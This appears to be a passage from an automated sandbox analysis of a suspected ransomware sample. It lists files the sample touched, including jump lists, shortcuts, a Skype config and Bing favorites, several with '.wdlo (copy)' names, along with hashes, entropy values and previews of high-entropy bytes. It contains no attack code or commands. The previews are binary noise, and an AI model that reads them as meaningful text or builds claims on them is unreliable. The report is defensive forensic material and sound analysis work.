                  Preview:....R...J.T..^5.N}......BE...l.....L\...u...U\dy?..;..a..:..?..aE..1C.Bb...!.......L.....[..t63[..*...d[...5......&g9.7........Y..@......v.KHa....^...'.*....[...u5.f\. ...(....?`!.N..z1........j.C&.......d)DJ2...C..MUq%...-....shC..03.5.'....V{$..b."..D..{J.y..]eAa.0..}..:.p3.i...'.A..J*..w......?:l&..L......B.T.....].......JZ.Q..s......q.|h.I..;D.)..C.{W....S1,.[..o.h"_..^M.f..0_..6.z.]...........\..G...A{. q.Wp!.T.H.DSUv..G2..H..%x....v.n..i..).E..:^B....i/...k.S./.o.....5Z/....D...`_...U"..i...f.U..........A.......d;...M.......H.`.,..."4`H.6.}..N..,/.g.H.....H.L&.....8.U..0.B.:........f#...../+.7k...M...._NZ.Q..b..j.D[.$x_...g.U].Oh%..1.A........$....,.......*06...|......&.../. e>.7NAe.9.j3...t.}.....P..SO...f.R8.LTo...F......z_...Z...p.|_.w...M(,...C..\......F.aEI.F...>.G.5.#D.U....../....Rj..RY.(:....t...w3.ct?...{...A..P A...W$8...F.}....2z.-... ............+.y..W H^.....n$...5>.9o5.)...}......p. .1|...j.....Vd.,c......s..?.."..J....a...U

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\b8b3a97bfbf120b6.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.9322759036215436
                  Encrypted:false
                  SSDEEP:48:cCw9T2EfaRtEVfdkYLrBH7bMhKoNbR2Qis4j60TxQ5aIY0v3nD:x+yEfuENiYL9HUKoNNEsa60TxUj7
                  MD5:57033D2D98286A6C04421091ADA52454
                  SHA1:618EABC2A42C6F163B55D6794F1F2E9F3577DE1D
                  SHA-256:A777236E0C8C1F2F4D8F458A4249FC75DB07135BCE3B6A4CCDA34B669153074F
                  SHA-512:0E4C0B90F3BBE7BF246605B6C7364A537321204D45B486933C5C03B7A2112EBAE8979C5C28D6080E6B51C0BB223766E9DADB59286032F1C2D236164814455AA1
                  Malicious:false
                  Preview:....Y...S.BRcv......XG3OK.Z...B6..oL.. .e.%wldH......l.......;..8.14./.S.z`.Ag.iG_..W..Q.,.Y...../?x3X..........6D...u5E.......d.h..Z./n0.F...X`..`.s.....,..r&.*..)Q^H^.z..,.....f.@l.K,*....\C.....UK.P..x\...."iu.}J.tP..$......v....WXe9..UW}%.{..p;W4....+.......,.S.O...f...|............;..j:..<......r......z....h..H.0......vu.w..5.R....6....DK..:..q..kq....j....Rbb...7>.S....y.h.....C.e0s......i...0...fQ....C...q.nj....2j...xL.i(..C...0....#..0.(+..d..39{...ZKR5...'..<...]2..0..#I..:..Tr.......fwv.xt.x..>.>.9N..!s)..B..&....`..n...C...5....~X*..pB"op.--_I.z.....3Y...#.U...=.c.V".*...d..z.>......[......j."y~...U.QQs.G..-.....n.5s8......G..xG.;V.@f~SB/ ........<..h.8.....`..Pz....K.V\B..(J.*xn..p..(c.";$IA=.|.............Z......2.........?6+..'"}.. .]..H..P......&..tV......S.....N0.oyZ.6.W.....mv.*J3pA....z....BrRb....(r_....<._...#.j2t.T...k.i....*...1o.=..f..B."T`&..#e4.T..b.....\....?. .xDn.P....J..j1.\...K#.m b..........W...O[Z..JV.i*.V.[.

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.938115920769482
                  Encrypted:false
                  SSDEEP:48:EIjZawrtA1ygHGOlselPedX5c8pGXK0c4no1T03jY58CzDAcNat4IKJ6tLiF4i3D:pjYwrtEvO4erc8pOK01qT0TUzMcNatch
                  MD5:581F975E4CCBFA4C31142A627A4583FD
                  SHA1:9A0ADF25049FDA1C8E4DB16BD269A51EACAA5036
                  SHA-256:BFDC52FDFFB8F9F0B4FAD15CC93D3C22D108209729988C5DD0F9003E9BBE2241
                  SHA-512:2B8D07FE2862CE1E20ABE854A15B5E5ED19A0F0FA87137972D5C5303C651FA9134BE1A07A3E6FFB5ABCC942DE221E9019B79D4F828136016A9EC19F60065477C
                  Malicious:false
                  Preview:....B+.x...W..R.'YQ.%..|a.]e..... 5./1..d{82u1Y.t...qr.2._....v.+..D<..s.f&>..y..D.I:~@..h.d.!..Y..f...gX6..>t.E^...[..P.....p(.....G,....k.3.Q....z...T.I}cs..\.T..]e.=<.J.B.h{4>Y..L...je.n....o;|....".('..M.1..Ta..B.N<.....F..{].....JI..1V.a.]4.@.'..s.....EG$7..iU7...#1./..?B.V.Z..E...>.r.;...EU......jY..0...&r......s"w.N.6...b...|X..........J{}.9.B..8BKN.[~:....s.)|Y.|....1t\-m.h....5.j!'.a.0...O.....a.>..n^.....E.....0.P.=K...n_r...e.{..dt.^..A7.Z..4.'......z#..W.u...s...o....U-+...%..?.r...e<l0.}T..g...e.qj6.....>.......B.qzw.D.>x.f/j..Bb...N.....O.....Zq.+.g(.Z!....PD.6Y...y......-....-..7...-.G-..S..x.^.bd.}&.......P.p.."......_..L.$...ZE..\D.q...+%....n...XF........DQ.e..-9....i.R......6|.X5_.)...E..SZ...M9... ...f.[Pn.35./$A.t'..I........T...........}.H...K.E..m.wAaZ:........7..!'T..S.VL?......]../.d....Nx....J.z(..Xb7..r!..`.}_..C.e.=...^..F......k/.h..@..g*.G.Kf.J.........lg..iO..T..i...E......W..7.....*{'....fb.....

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9550
                  Entropy (8bit):7.980673983291734
                  Encrypted:false
                  SSDEEP:192:X/qAohJsvOalPvEjnlF/Z22MPK8q3MrUDaR0a5Kz5VLemo5HKc:XnAKD3GF/jV4MaZoz5VLZo1p
                  MD5:6D7010A8E6348906879F0508BA7342BC
                  SHA1:74A41C2177332BEBE579E5A39EF14874D3A5F9F5
                  SHA-256:16AB8B4ACE6D9EF1ACAEB0A57E5A544AF6EF7C6A45ABA01EA9B4F3722141DC71
                  SHA-512:0CE57EB0D8F0F7F09156CA68FF03ABCACC66D14326EBD5F23F3CC57A2C844839538528E146E920635F95668ABB73B8132777F704F711DB4584060265D611177F
                  Malicious:false
                  Preview:....)..dJj...)P....li|.zT.......:8F.y.k.^e...W..HuH.4M.6.....2.#B.C.#...%h.C..T.C.NbR.Vxt0:.c.. z.d.=;..H.........#..n......vX^..3.....xiw...*...S.'...n..|B.5....".^;I...n.{.}-......I..(..d$.[.H............Z....m...._?.....6..}}X..3.9.....G...F.|)Ga....:...4..:.O...l.7/a...u.$..9`.+....&Y...|.A..~.N.....\;.v..A...@j..\p.=.3....b0.?.5I.3...{4}.1e.]....XZ...c.2....}.I.o.p-V.y..u.U....8.0 .yd.:.C..Q)A....b..D...".f.%!5%......[..*]. *.....U.z.....%..{.3...O..8..-.j..2.t....-C....7....>...t.D..V.R..p\...`....2t:J....f.<TP..$.4P9..."w]....<...9.g..K.U."...:......`.U.@..Te.>.D.[$5L]..Tn..Jd.f .$......T)f....F....*...[.56.....hz1]1...n.C..{...\.^...Z...C..D~ .3..33y.<...U*...w......4..B.".).Q..4,..-Wu...V.R...O...J..?..PW...k... hU)h......q...me.....M?:y.......(.N...x.oR.:.....E.-.Y..#..w....H..yv.".+..iK.RX.1&......d..sS.'n.D..I..S.!.o...c.....Ok...j.mh.7..{.6...*9...E...Es....%.....B2.2.b....p..L.....Z....p)...}..qw.A/J...h...B.H]........

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\fb3b0dbfee58fac8.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.935700948709438
                  Encrypted:false
                  SSDEEP:48:68YugX3xWEmqEpxfMmNFe3ftQWn5/NKi7KAqS/Fjq8m8Hfhq6jYLBnlUN9raPXd5:fYfXhWEGdbe36iFZnqSRoyzjYLtlUve3
                  MD5:1B58752F17A430735FD396840AE12E48
                  SHA1:D87CA8E56C4D2151320D26A5F8C873D7797CF470
                  SHA-256:60827093305193C20C6012480F80F41CF9B03324993F449AED099F72B327DC48
                  SHA-512:249C701E41C3768C35E5A541AFC42B99E40E5CF7C3DF005E00CA458C049D6949C55229AC2D004E3B1402DD5B5B3FECC89080B0BEC0AB8DAB4A9AE2D90055CE9A
                  Malicious:false
                  Preview:....y~..\..-.g.8.....$&05......Z./....Q..D..].j...?d..d..wV..pj..hop%....I..'...~.6U!K.,.].....]E....Z1.....S.c.?...Q....!f.w$].....3.0.V.._.%.....~....v..._...l....HW.P....c.@....Q..S.u/%.$.].L.B"..!...?.e..!...(...#.W........!....j.,..Y........;...A..Fc....k(.nh?.....V..5.(.OTA..5...zLN..........hn.....P.._ k.Ob.."c\...R...)..[J...b'zu.#...4./c:2.=.J..nw@G.o-.y..u..s...h....}....e(x..%C...%"Io.W-.j.[........=..Y..n.-._.9.\l....T....`..OH.Rzq....z....Y.....s_.....\T.c...c.4}.f."..a.t..t.W.....e...h.;..Q...k{.U..O.....M|....0|k.i....V..&{..fp..D......J..7.._A..D~..r...4w.a............ll..l>..;Nh.O..".Kh.+......~...$....[f.~....6fjy./..bA......J.e.@L..?.c.;..+.<{2:.8.%t.r..5ax ..z. .....KB".........JGJoSt...|.[.%.:....87.."..V...q.>.sQ....%....VN. .2`R"E.cI..o.n.._..zW,.d.......I.ip_mw....".zI..t`t.Y<.....e....|.......bA..t........V.^.9.S..`..k....h....e.f......JBt..f%jA.f.9zP..Z.S..4~..63.!....U.GW.......G..l.'...T......1..Z..FB>..

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.304473312344099
                  Encrypted:false
                  SSDEEP:6:pFtOnFzjJ+NXCPBPd+K+W7OEZ+LWBkRJurM/pxVGth9vlOsVolWbz6Wcii96Z:g1jJAX16O6+L+Y0rOpxV6PX36Wcii9a
                  MD5:C56ECFF8B97B42CD576EF360AFB72BC7
                  SHA1:1254999C7B6500F6F1A8C7229B149EF55098A619
                  SHA-256:10A8E160B60E27743EDB8FBA06FF8CD1913F2711B1F2827EE08EF081131831D6
                  SHA-512:97E2238EBB6905F1084867603230D348370C4182A8ED8D4298570FFEB584CBDD19D87165EFF15BB6F717D16DBDAB5C993B7D64E96FBD3578A2BDB7E7E4CF1711
                  Malicious:false
                  Preview:......sI...Ha.c......c....'b2.z..2.ga. ..u....P.{.~...L..w.,(.F.g.X`.B.P.....h.Q.j.....5....]q...#.Bm.xa...C[.=.a....3kQ.^.0....l..1.l..p.1...M..A|.<..(.....t^Z M.wcd.F....z.......<........u.8.P[..v.z...X.s..6.`M...L9...0.$......2..`o>..Sq...4..L.)J...d.L. /..rNNq...+.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.381874166937805
                  Encrypted:false
                  SSDEEP:6:nE3auc/CRaA0eOgotq9bNbAl0R6YIyddZscksD9yjnUc9ROsVolWbz6Wcii96Z:E3af/CZ0eOgotq9bNwKd0dsETp36WciD
                  MD5:A71B4F6B71886555C27B97684A478394
                  SHA1:57B99D417D074146FE0CC4FC91A803133729E304
                  SHA-256:6000CE86C8253EBEBD4557E0992245C484D9295A56B86CAB7DCDC5D8493B5742
                  SHA-512:E3C69D4CA14F25FA8B59AE80A8DA4A2D28CE774D18DA5ECE6059913AF2E5E7AADE8A8A03193BD1855176BBB01BBE2A3977932506F7819A73EA8EE7AD33E6FD1C
                  Malicious:false
                  Preview:.....8 ..W.OmHnU.,..p.J..R.....|.4..dZ.W..9R..b....~...h.....]...ow..k)...x.E.....;.....u.._.(e..>.X..9..h...zz=..w..f}...J.o.|...).......)..8W......X.jY.Y../..d...O.....5......PQ..C..\....m..`.i..........Q...\..#......_...P5.a,........Mx.\V./...v..b~.@l.}._..Ro.Di0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f18460fded109990.customDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.3630057660937736
                  Encrypted:false
                  SSDEEP:6:utznh7PapJZRRahCSd9lLpcfviZiPwJgTFVFhXUGduCYVwJLzybOsVolWbz6WciD:uRnpPihRah/d9lnZi4s/yViLzy936Wcq
                  MD5:2BD56A8F3E10212E01803A87977608E2
                  SHA1:46B7BA4EF56DBFEB8F1A760A36E335EA175C96BD
                  SHA-256:5FF064579648BD5E135346C1E91444C4565789BCD333D8EEF43712D91E8C06EC
                  SHA-512:524E97E5A78C98FB65E76FC4A2EB678325E0E5FC3BFF4220A5A50DFB13ED63BBF81B18E66DF44334C28868874F31D41D48F3A0A75CEAA32ECF8B1ADC0C7588D3
                  Malicious:false
                  Preview:.....u......T.v..WY. cQ|....`*I.3.=.6.]...Wy.j.%.b,s.2L.S....RL..ls..wX@.../...A.....(......n./.......P.....q.:h....4.7.~."...[.........VJ/...i.6|.lI......qu.`.....WGtFp`....k`..^...2b....F:I.z.F0....Xv..i.H..d..'......=;..r]\....D.T... ..R....v}...1VF......]......6.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1383
                  Entropy (8bit):7.86992044249279
                  Encrypted:false
                  SSDEEP:24:em700TJXgOxsT9Dl7lBd0m0S6OEOIFb4Y4ROZGb2MHv7RRMT3zbD:M6Xg3p7lz0m0S6ONXPRx2W7RRMT3nD
                  MD5:73F1EDE073AF2F94D015E96B276F2428
                  SHA1:8240EB6D5A616432CDF4013750CF493D70E48DDC
                  SHA-256:7A0A3C9EC141C118C388938DC4B7C1F821F7AF43B02B61A6F8E7A02FFB8C5700
                  SHA-512:47A7854D69320F231D1AC0BD00F7B9CC15A4D4C1C709071FFF9DCECB463A7EE4101472EC8A23916FFEF6712C3442357DBF6C63C93931777C162E4982291A119B
                  Malicious:false
                  Preview:L.......S..8W..LS...ND.J.z..#...(...B.X..'..' p....?.x.1X.i'.h..J.5.q..gvn+......W&......a..q.h...y.i.......R..P}..d....n....... .Akq....fC..|.F)..L5.....C.*s.vF.D...43V.....msp...m....`.y.C.|........Q..6..`P.O&...`.....L..f.[?...kA...i..|.n...!..c#<.v..Fc*\eNz G.!.pi7.t.Z/...~4.ST....z..E7.2]V.lj.o..9.+._..S...O...'...].T.m.h.......F....z1.u....+o..g....k..[,.Q.9..}..P.&q..o.\.4...cN^Nw..C..#.S:-..';H.X.H..).^-.i.>q.yF..CL..d..Rm.........b'..9D...I.R..V"x.VB.;+.E...Z..z..C.....9v.......=..z.vl..~"..?.-.Kc[...4.d..U.......u1...N.v....4'..m\.M.ZF..{..|....=,$....v..w.m`k..=..s^L..i.^..D..G-6..N.c..w%#n3gHU....j,..vZ./..........!....u2OZ...C....o.<.".j.-Bp...7... .T.@f......a ]l\...Z....R.S...X........|..G...)7.^.!..w.....$...z.._8J..G'd6c......^...U.y.5.'..'uj.n....p..D..A.]s.../.}.[..+..aH?.e..L.9..s.n..3W..5;.Kl.H.-..w.>.. .L.m2..S.f...)/ .&l^.......R..:..S.u3<..../d.....}.A_v.$3M.0!...S..DQ......... ...;.....].X..[....,.U.uC.../....b...6\..U.:...

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):7.319006238613504
                  Encrypted:false
                  SSDEEP:6:o5CTbq4Qc6v2OFwOkkOQpG2eAFGqZqs5ffIck917W36ubz3OsVolWbz6Wcii96Z:k4Qc6eOFwF0p4AFGqZ7fzy17Wqubzx3D
                  MD5:2069B316393323042731A54281487B3E
                  SHA1:E10B8DB40D259D2E59C52E3800D85A7613B086EC
                  SHA-256:DD57A2E30191C272966E172D5E571677880DA63670F8446834DB318125225E8F
                  SHA-512:D6DADF525460F0B7A18FDF1B09436B68754F917EE8D1AC5F6DBA3EBD5A2956FECA45697A1440C7AE83BB5D8CDB6184E633ABE741F78614767D242417954E6DC6
                  Malicious:false
                  Preview:deskt..{.R\H.Z..;...Q.%z.,:.]..w.....@'....Q.l..Ji_...J...q...YA..Z....(.....U.+.y....(....m..A.....Y...........*..cA.......J.e....72..~.~.r.8...F.N.7.i...7qp!.._[.d.si$..oO.?....#.=aU.k......J..La...v&z....6.a..K.v..Fi..1...^.5w.G....6|..........{.....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\AppData\Roaming\Skype\RootTools\roottools.conf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):410
                  Entropy (8bit):7.375370323117341
                  Encrypted:false
                  SSDEEP:12:gOLg8I0TQ7kajw3nMQ76JrQ2T5I3GomF9Q36Wcii9a:gOL7l09jwXMQmJrQ2VEP3zbD
                  MD5:CEEAC8D3FD9A6F10D9270F2E5333D16F
                  SHA1:DE7139E334512EDB7BC46D6B9E3F13C39C09097C
                  SHA-256:E4333154F742BAE2A9C8BB1EF0BE4766B349C022C480C1FD5290A8F23CF9A9E1
                  SHA-512:EBD7C0DF725293501A495BF1D35AF86C59A6B09F91F8379BD964DF48C4094533659D0ABC29F8399B0E37F8AB5951D36D0930C410C69E5D9BF7AD5C37A47DD174
                  Malicious:false
                  Preview:node_.p.r.....!... .VV....Z..../..3e._E.v......>....=.$P.5..X./`D:>>%.V. u..uYX.......Y.d<-.......e......[S...0.[m..........'..I..,..|R8.......w..7Z./..c.....i.......9.C0>2.?........f....4.g.mG...)NP.0!j......{^.1r.....i...lT.4=.}Y."!t....~.d.[...:...!N...J........m..C..!..P5N.-..q.[.N.*......@x....O..?....y..X.[8fi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Application Data\Skype\RootTools\roottools.conf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):410
                  Entropy (8bit):7.375370323117341
                  Encrypted:false
                  SSDEEP:12:gOLg8I0TQ7kajw3nMQ76JrQ2T5I3GomF9Q36Wcii9a:gOL7l09jwXMQmJrQ2VEP3zbD
                  MD5:CEEAC8D3FD9A6F10D9270F2E5333D16F
                  SHA1:DE7139E334512EDB7BC46D6B9E3F13C39C09097C
                  SHA-256:E4333154F742BAE2A9C8BB1EF0BE4766B349C022C480C1FD5290A8F23CF9A9E1
                  SHA-512:EBD7C0DF725293501A495BF1D35AF86C59A6B09F91F8379BD964DF48C4094533659D0ABC29F8399B0E37F8AB5951D36D0930C410C69E5D9BF7AD5C37A47DD174
                  Malicious:false
                  Preview:node_.p.r.....!... .VV....Z..../..3e._E.v......>....=.$P.5..X./`D:>>%.V. u..uYX.......Y.d<-.......e......[S...0.[m..........'..I..,..|R8.......w..7Z./..c.....i.......9.C0>2.?........f....4.g.mG...)NP.0!j......{^.1r.....i...lT.4=.}Y."!t....~.d.[...:...!N...J........m..C..!..P5N.-..q.[.N.*......@x....O..?....y..X.[8fi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Favorites\Bing.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):542
                  Entropy (8bit):7.538633020767943
                  Encrypted:false
                  SSDEEP:12:qeo04FXDujXh8nrPCAdqZy4v4U7X7bjKXLpiDweLt8Ox/36Wcii9a:q1uXqnbC8qPV7Lbjei9iS/3zbD
                  MD5:B154835720A673C77301A2884893D0D7
                  SHA1:4B4109EB87AC37D699F85F721967524D9680A408
                  SHA-256:6FE315C608CF7CBA68804AFF2B1FD3EBDD132BBEE3E4A40F83C29DFF6F84F2FC
                  SHA-512:34F5C697D3E9315DD7DE9E8756DFD4D52DF0A2E97F97F33C61BFE2CAAFE18F1E7B88B9070D9A6E407BF904B73E7A2F74B0D06EBDD508A4C4AF00FAB3A75FEF7D
                  Malicious:false
                  Preview:[{000d.-..cb..Y|..?.w1[.9.L....f.5.A....TG.8.7...HR4F.....|..|qy.o..f.BT.J.........R.]d]8......f..r..LG.&....h.-8[....^.."-...q.....wH...c.....;....9...L...[D.0....e..F.....y.%G.B..2>f3.cC.IP......#...nv..Fojl^.N..dr]..@..>?..;.r..F<.>.0............[0.y...~......>@....7I0g.......r........h./..x.I....7.r.Q..., a.sc~C.J.[.j...;K....f7gw.ib1..cv.=Z]..F.8.!..+vg..F.i.t. 1.=7Z.b.'..."t .OR.&).....5.o:...s.MvU...U...Z).....g.x..U^q.9.y%..#t..ki0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Favorites\Bing.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):542
                  Entropy (8bit):7.538633020767943
                  Encrypted:false
                  SSDEEP:12:qeo04FXDujXh8nrPCAdqZy4v4U7X7bjKXLpiDweLt8Ox/36Wcii9a:q1uXqnbC8qPV7Lbjei9iS/3zbD
                  MD5:B154835720A673C77301A2884893D0D7
                  SHA1:4B4109EB87AC37D699F85F721967524D9680A408
                  SHA-256:6FE315C608CF7CBA68804AFF2B1FD3EBDD132BBEE3E4A40F83C29DFF6F84F2FC
                  SHA-512:34F5C697D3E9315DD7DE9E8756DFD4D52DF0A2E97F97F33C61BFE2CAAFE18F1E7B88B9070D9A6E407BF904B73E7A2F74B0D06EBDD508A4C4AF00FAB3A75FEF7D
                  Malicious:false
                  Preview:[{000d.-..cb..Y|..?.w1[.9.L....f.5.A....TG.8.7...HR4F.....|..|qy.o..f.BT.J.........R.]d]8......f..r..LG.&....h.-8[....^.."-...q.....wH...c.....;....9...L...[D.0....e..F.....y.%G.B..2>f3.cC.IP......#...nv..Fojl^.N..dr]..@..>?..;.r..F<.>.0............[0.y...~......>@....7I0g.......r........h./..x.I....7.r.Q..., a.sc~C.J.[.j...;K....f7gw.ib1..cv.=Z]..F.8.!..+vg..F.i.t. 1.=7Z.b.'..."t .OR.&).....5.o:...s.MvU...U...Z).....g.x..U^q.9.y%..#t..ki0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\Adobe\Color\ACECache11.lst.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):932
                  Entropy (8bit):7.745192310245474
                  Encrypted:false
                  SSDEEP:24:mOGh4Wi+C7jy2L2PUSeAToEgXnatzWelrtaHFyK6LfsCro3zbD:rP+4V9SzEEg3+zJlBQ1tSo3nD
                  MD5:B1DC3DAE85ADC53FC95112B89E5CE894
                  SHA1:A79C2ED62A1FFE78C9C0ECA4EC87DCCF061FE9F9
                  SHA-256:4F1A50C0947C6F40F8F4B8A3505FD8F8727925C419A7BD20140C3524DCA45EE7
                  SHA-512:D109ACA04A53B59B49ECABDD046370FABA4AFE118C86EA45ECBB5E64F6B7F8248197301C6BD9090BBB68C90052E00A45266663CD947FE86445CCDB730CB54FB5
                  Malicious:false
                  Preview:CPSA.r..K.........(..~U.{.5.M].......r@.g.N..ME.z3..Ch..:)..nOQw.L...ZaQ.T..........N...8...P.a....2.1!......j....v.o1...C)..E.x..4...$..H{...>...t....C ..m....e.U.Jg...HU.m.......$a8.1M..Q..[..Z.....$..@..75 .fX@...m...M.T...n..f/DL.8=...mQ(s..)O.=.[.!^.....3.8.....7.R...H{2T/7....e0....JRK7kd.[dm.G.GdBe-.4.L.......g#..n.....'s>...';.."!|.p....<.b......}k....:..A....<g.S;..r.... GC...?4..5...>.U.'....#C. ...S..)/.9...o..q+.f)...Q....B.}.e&..9.".g...n.....<.4#.$.U...R(..5-v..0....-,. ..I..{.m...|...].8}S.K~.[.w.......\[X'.\T.=....^|.,`J...F.,'.....A...{A%/<k.bv}.......Z.gFD.UE..G%..v.h........\.\2vgKA!`..9G;.v.rQV.x...}......6.T.tik.........h....C.+.:...^...2.Z.....3s..,k...XK.....g.....W.H...3..Ij....k.'..8...D..8.G.....2z...e..p........ .D.%..+.].N..''8..d.....A..J:..:J.CY...TZ`..d.C.4;.`B.-.j.h...C.......i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\Comms\UnistoreDB\USS.jcp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978460164485167
                  Encrypted:false
                  SSDEEP:192:ZB1CK+ezfIRwQFpn3vC58rMcjZnZzOuxMrOj8/4qgNliRCwOn:Z2K+cfawQT3vCiwcZZKu+rAnqgNwR0n
                  MD5:DF5822C8DFB8882E14DA6540F9E21D69
                  SHA1:E9FDD21B90831A3069652C19B82D510791972828
                  SHA-256:1D794B79FCC5EA98B12F84A0708204B354B7DDFBCEC8EC1FDFB11997B7723B7D
                  SHA-512:7A04317832AF2F7FE9CE86DBE59B15C1A8926089BD44E37F7D956B0F1D2710F9F0B853A1955A2DB4A073D7571BB2DE0E1334F969AA00EB4D67553D3C83E12596
                  Malicious:false
                  Preview:.M.#....f....u...$.X...Zn...c.G1o...j71\i..<D.Y.S g^XP...(...$.E>!#K.....Y....;F.T.W>.......W9.@.W...o.@.......M..6b..R..*.4...'...aM.z....q...."..a.K...D..lR..................%*..I>Y..."mD....Q...Q<..r.X....!B.7...h..*B..9...;&..%..B31.NF...7w..9G......l.L../..5...q.(e....<P....&..E.,4.....cC.I.b.K....p.3.-.NT...%..B..ff(:..Z.+.TG.....u>.{4#.i....RHR...(.......j.a8.Ip.zo...a.NC.1.w...L.....G..`...!.?T...{.P.\'Lf.........=<...d.1.%.,zu.>@....%.....f.o.......d#.TP..".....N..C..yf..mcr+..%....."...:..B.@...J.........`}.E~J...~P.K......n..J.m%.......]3Z.I......@..\.u.X`....&..u......!!..n..+v....J....$......eJ.<Y..v}... .ms&..;_.a..".x...,h....4.".)G.F.'n..._.L.~.......:...."..=..I......._ .5..c.m....CGC.R....Ly.5..7J..A...8...;V.#......B...Fd9*.Z.|.......n.@....9......T<:$...._..&s....L....98~y.d."..8q...gf.5z^.G.....I...GT..l.+U7..H*n'.%.N.Lh.....v.a.)..F<K.?im......TQ.).Im..OU.M.XW.."..........V...B.2.. ..A.E...'6.+.y..$.[.(.E.

                  C:\Users\jones\Local Settings\Comms\UnistoreDB\USS.jtx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):1.730976270852684
                  Encrypted:false
                  SSDEEP:6144:+RNaxfJrSNacqff0mpLQOUOo3agO/qqv4RROYdVbtzFnrG5J5qh+AJ3TGXZAcbBw:brSNdmpLl3fCdYSN
